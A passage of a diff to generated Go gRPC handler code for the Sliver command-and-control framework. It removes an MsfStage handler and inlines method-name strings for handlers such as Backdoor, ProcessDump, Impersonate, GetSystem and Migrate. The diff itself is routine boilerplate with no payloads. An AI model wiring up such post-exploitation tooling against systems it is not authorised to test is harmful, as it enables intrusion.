return interceptor(ctx, in, info, handler)
}
-func _SliverRPC_MsfStage_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
- in := new(clientpb.MsfStagerReq)
- if err := dec(in); err != nil {
- return nil, err
- }
- if interceptor == nil {
- return srv.(SliverRPCServer).MsfStage(ctx, in)
- }
- info := &grpc.UnaryServerInfo{
- Server: srv,
- FullMethod: SliverRPC_MsfStage_FullMethodName,
- }
- handler := func(ctx context.Context, req interface{}) (interface{}, error) {
- return srv.(SliverRPCServer).MsfStage(ctx, req.(*clientpb.MsfStagerReq))
- }
- return interceptor(ctx, in, info, handler)
-}
-
func _SliverRPC_ShellcodeRDI_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
in := new(clientpb.ShellcodeRDIReq)
if err := dec(in); err != nil {
@@ -4454,7 +4237,7 @@ func _SliverRPC_ShellcodeRDI_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ShellcodeRDI_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ShellcodeRDI",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ShellcodeRDI(ctx, req.(*clientpb.ShellcodeRDIReq))
@@ -4472,7 +4255,7 @@ func _SliverRPC_GetCompiler_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetCompiler_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetCompiler",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetCompiler(ctx, req.(*commonpb.Empty))
@@ -4490,7 +4273,7 @@ func _SliverRPC_ShellcodeEncoder_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ShellcodeEncoder_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ShellcodeEncoder",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ShellcodeEncoder(ctx, req.(*clientpb.ShellcodeEncodeReq))
@@ -4508,7 +4291,7 @@ func _SliverRPC_ShellcodeEncoderMap_Handler(srv interface{}, ctx context.Context
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ShellcodeEncoderMap_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ShellcodeEncoderMap",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ShellcodeEncoderMap(ctx, req.(*commonpb.Empty))
@@ -4526,7 +4309,7 @@ func _SliverRPC_TrafficEncoderMap_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_TrafficEncoderMap_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/TrafficEncoderMap",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).TrafficEncoderMap(ctx, req.(*commonpb.Empty))
@@ -4544,7 +4327,7 @@ func _SliverRPC_TrafficEncoderAdd_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_TrafficEncoderAdd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/TrafficEncoderAdd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).TrafficEncoderAdd(ctx, req.(*clientpb.TrafficEncoder))
@@ -4562,7 +4345,7 @@ func _SliverRPC_TrafficEncoderRm_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_TrafficEncoderRm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/TrafficEncoderRm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).TrafficEncoderRm(ctx, req.(*clientpb.TrafficEncoder))
@@ -4580,7 +4363,7 @@ func _SliverRPC_Websites_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Websites_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Websites",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Websites(ctx, req.(*commonpb.Empty))
@@ -4598,7 +4381,7 @@ func _SliverRPC_Website_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Website_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Website",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Website(ctx, req.(*clientpb.Website))
@@ -4616,7 +4399,7 @@ func _SliverRPC_WebsiteRemove_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WebsiteRemove_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WebsiteRemove",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WebsiteRemove(ctx, req.(*clientpb.Website))
@@ -4634,7 +4417,7 @@ func _SliverRPC_WebsiteAddContent_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WebsiteAddContent_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WebsiteAddContent",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WebsiteAddContent(ctx, req.(*clientpb.WebsiteAddContent))
@@ -4652,7 +4435,7 @@ func _SliverRPC_WebsiteUpdateContent_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WebsiteUpdateContent_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WebsiteUpdateContent",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WebsiteUpdateContent(ctx, req.(*clientpb.WebsiteAddContent))
@@ -4670,7 +4453,7 @@ func _SliverRPC_WebsiteRemoveContent_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WebsiteRemoveContent_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WebsiteRemoveContent",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WebsiteRemoveContent(ctx, req.(*clientpb.WebsiteRemoveContent))
@@ -4688,7 +4471,7 @@ func _SliverRPC_Ping_Handler(srv interface{}, ctx context.Context, dec func(inte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Ping_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Ping",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Ping(ctx, req.(*sliverpb.Ping))
@@ -4706,7 +4489,7 @@ func _SliverRPC_Ps_Handler(srv interface{}, ctx context.Context, dec func(interf
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Ps_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Ps",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Ps(ctx, req.(*sliverpb.PsReq))
@@ -4724,7 +4507,7 @@ func _SliverRPC_Terminate_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Terminate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Terminate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Terminate(ctx, req.(*sliverpb.TerminateReq))
@@ -4742,7 +4525,7 @@ func _SliverRPC_Ifconfig_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Ifconfig_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Ifconfig",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Ifconfig(ctx, req.(*sliverpb.IfconfigReq))
@@ -4760,7 +4543,7 @@ func _SliverRPC_Netstat_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Netstat_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Netstat",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Netstat(ctx, req.(*sliverpb.NetstatReq))
@@ -4778,7 +4561,7 @@ func _SliverRPC_Ls_Handler(srv interface{}, ctx context.Context, dec func(interf
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Ls_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Ls",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Ls(ctx, req.(*sliverpb.LsReq))
@@ -4796,7 +4579,7 @@ func _SliverRPC_Cd_Handler(srv interface{}, ctx context.Context, dec func(interf
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Cd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Cd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Cd(ctx, req.(*sliverpb.CdReq))
@@ -4814,7 +4597,7 @@ func _SliverRPC_Pwd_Handler(srv interface{}, ctx context.Context, dec func(inter
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Pwd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Pwd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Pwd(ctx, req.(*sliverpb.PwdReq))
@@ -4832,7 +4615,7 @@ func _SliverRPC_Mv_Handler(srv interface{}, ctx context.Context, dec func(interf
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Mv_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Mv",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Mv(ctx, req.(*sliverpb.MvReq))
@@ -4850,7 +4633,7 @@ func _SliverRPC_Cp_Handler(srv interface{}, ctx context.Context, dec func(interf
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Cp_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Cp",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Cp(ctx, req.(*sliverpb.CpReq))
@@ -4868,7 +4651,7 @@ func _SliverRPC_Rm_Handler(srv interface{}, ctx context.Context, dec func(interf
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Rm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Rm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Rm(ctx, req.(*sliverpb.RmReq))
@@ -4886,7 +4669,7 @@ func _SliverRPC_Mkdir_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Mkdir_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Mkdir",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Mkdir(ctx, req.(*sliverpb.MkdirReq))
@@ -4904,7 +4687,7 @@ func _SliverRPC_Download_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Download_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Download",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Download(ctx, req.(*sliverpb.DownloadReq))
@@ -4922,7 +4705,7 @@ func _SliverRPC_Upload_Handler(srv interface{}, ctx context.Context, dec func(in
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Upload_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Upload",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Upload(ctx, req.(*sliverpb.UploadReq))
@@ -4940,7 +4723,7 @@ func _SliverRPC_Grep_Handler(srv interface{}, ctx context.Context, dec func(inte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Grep_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Grep",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Grep(ctx, req.(*sliverpb.GrepReq))
@@ -4958,7 +4741,7 @@ func _SliverRPC_Chmod_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Chmod_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Chmod",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Chmod(ctx, req.(*sliverpb.ChmodReq))
@@ -4976,7 +4759,7 @@ func _SliverRPC_Chown_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Chown_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Chown",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Chown(ctx, req.(*sliverpb.ChownReq))
@@ -4994,7 +4777,7 @@ func _SliverRPC_Chtimes_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Chtimes_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Chtimes",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Chtimes(ctx, req.(*sliverpb.ChtimesReq))
@@ -5012,7 +4795,7 @@ func _SliverRPC_MemfilesList_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MemfilesList_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MemfilesList",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MemfilesList(ctx, req.(*sliverpb.MemfilesListReq))
@@ -5030,7 +4813,7 @@ func _SliverRPC_MemfilesAdd_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MemfilesAdd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MemfilesAdd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MemfilesAdd(ctx, req.(*sliverpb.MemfilesAddReq))
@@ -5048,7 +4831,7 @@ func _SliverRPC_MemfilesRm_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MemfilesRm_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MemfilesRm",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MemfilesRm(ctx, req.(*sliverpb.MemfilesRmReq))
@@ -5066,7 +4849,7 @@ func _SliverRPC_Mount_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Mount_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Mount",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Mount(ctx, req.(*sliverpb.MountReq))
@@ -5084,7 +4867,7 @@ func _SliverRPC_ProcessDump_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ProcessDump_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ProcessDump",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ProcessDump(ctx, req.(*sliverpb.ProcessDumpReq))
@@ -5102,7 +4885,7 @@ func _SliverRPC_RunAs_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RunAs_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RunAs",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RunAs(ctx, req.(*sliverpb.RunAsReq))
@@ -5120,7 +4903,7 @@ func _SliverRPC_Impersonate_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Impersonate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Impersonate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Impersonate(ctx, req.(*sliverpb.ImpersonateReq))
@@ -5138,7 +4921,7 @@ func _SliverRPC_RevToSelf_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RevToSelf_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RevToSelf",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RevToSelf(ctx, req.(*sliverpb.RevToSelfReq))
@@ -5156,7 +4939,7 @@ func _SliverRPC_GetSystem_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetSystem_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetSystem",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetSystem(ctx, req.(*clientpb.GetSystemReq))
@@ -5174,7 +4957,7 @@ func _SliverRPC_Task_Handler(srv interface{}, ctx context.Context, dec func(inte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Task_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Task",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Task(ctx, req.(*sliverpb.TaskReq))
@@ -5192,7 +4975,7 @@ func _SliverRPC_Msf_Handler(srv interface{}, ctx context.Context, dec func(inter
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Msf_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Msf",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Msf(ctx, req.(*clientpb.MSFReq))
@@ -5210,7 +4993,7 @@ func _SliverRPC_MsfRemote_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MsfRemote_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MsfRemote",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MsfRemote(ctx, req.(*clientpb.MSFRemoteReq))
@@ -5228,7 +5011,7 @@ func _SliverRPC_ExecuteAssembly_Handler(srv interface{}, ctx context.Context, de
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ExecuteAssembly_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ExecuteAssembly",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ExecuteAssembly(ctx, req.(*sliverpb.ExecuteAssemblyReq))
@@ -5246,7 +5029,7 @@ func _SliverRPC_Migrate_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Migrate_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Migrate",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Migrate(ctx, req.(*clientpb.MigrateReq))
@@ -5264,7 +5047,7 @@ func _SliverRPC_Execute_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Execute_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Execute",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Execute(ctx, req.(*sliverpb.ExecuteReq))
@@ -5282,7 +5065,7 @@ func _SliverRPC_ExecuteWindows_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ExecuteWindows_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ExecuteWindows",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ExecuteWindows(ctx, req.(*sliverpb.ExecuteWindowsReq))
@@ -5300,7 +5083,7 @@ func _SliverRPC_Sideload_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Sideload_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Sideload",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Sideload(ctx, req.(*sliverpb.SideloadReq))
@@ -5318,7 +5101,7 @@ func _SliverRPC_SpawnDll_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_SpawnDll_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/SpawnDll",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).SpawnDll(ctx, req.(*sliverpb.InvokeSpawnDllReq))
@@ -5336,7 +5119,7 @@ func _SliverRPC_Screenshot_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Screenshot_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Screenshot",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Screenshot(ctx, req.(*sliverpb.ScreenshotReq))
@@ -5354,7 +5137,7 @@ func _SliverRPC_CurrentTokenOwner_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CurrentTokenOwner_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CurrentTokenOwner",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CurrentTokenOwner(ctx, req.(*sliverpb.CurrentTokenOwnerReq))
@@ -5372,7 +5155,7 @@ func _SliverRPC_Services_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Services_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Services",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Services(ctx, req.(*sliverpb.ServicesReq))
@@ -5390,7 +5173,7 @@ func _SliverRPC_ServiceDetail_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ServiceDetail_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ServiceDetail",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ServiceDetail(ctx, req.(*sliverpb.ServiceDetailReq))
@@ -5408,7 +5191,7 @@ func _SliverRPC_StartServiceByName_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartServiceByName_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartServiceByName",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartServiceByName(ctx, req.(*sliverpb.StartServiceByNameReq))
@@ -5426,7 +5209,7 @@ func _SliverRPC_PivotStartListener_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_PivotStartListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/PivotStartListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).PivotStartListener(ctx, req.(*sliverpb.PivotStartListenerReq))
@@ -5444,7 +5227,7 @@ func _SliverRPC_PivotStopListener_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_PivotStopListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/PivotStopListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).PivotStopListener(ctx, req.(*sliverpb.PivotStopListenerReq))
@@ -5462,7 +5245,7 @@ func _SliverRPC_PivotSessionListeners_Handler(srv interface{}, ctx context.Conte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_PivotSessionListeners_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/PivotSessionListeners",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).PivotSessionListeners(ctx, req.(*sliverpb.PivotListenersReq))
@@ -5480,7 +5263,7 @@ func _SliverRPC_PivotGraph_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_PivotGraph_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/PivotGraph",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).PivotGraph(ctx, req.(*commonpb.Empty))
@@ -5498,7 +5281,7 @@ func _SliverRPC_StartService_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartService_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartService",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartService(ctx, req.(*sliverpb.StartServiceReq))
@@ -5516,7 +5299,7 @@ func _SliverRPC_StopService_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StopService_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StopService",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StopService(ctx, req.(*sliverpb.StopServiceReq))
@@ -5534,7 +5317,7 @@ func _SliverRPC_RemoveService_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RemoveService_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RemoveService",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RemoveService(ctx, req.(*sliverpb.RemoveServiceReq))
@@ -5552,7 +5335,7 @@ func _SliverRPC_MakeToken_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MakeToken_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MakeToken",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MakeToken(ctx, req.(*sliverpb.MakeTokenReq))
@@ -5570,7 +5353,7 @@ func _SliverRPC_GetEnv_Handler(srv interface{}, ctx context.Context, dec func(in
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetEnv_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetEnv",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetEnv(ctx, req.(*sliverpb.EnvReq))
@@ -5588,7 +5371,7 @@ func _SliverRPC_SetEnv_Handler(srv interface{}, ctx context.Context, dec func(in
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_SetEnv_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/SetEnv",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).SetEnv(ctx, req.(*sliverpb.SetEnvReq))
@@ -5606,7 +5389,7 @@ func _SliverRPC_UnsetEnv_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_UnsetEnv_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/UnsetEnv",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).UnsetEnv(ctx, req.(*sliverpb.UnsetEnvReq))
@@ -5624,7 +5407,7 @@ func _SliverRPC_Backdoor_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Backdoor_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Backdoor",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Backdoor(ctx, req.(*clientpb.BackdoorReq))
@@ -5642,7 +5425,7 @@ func _SliverRPC_RegistryRead_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryRead_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryRead",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
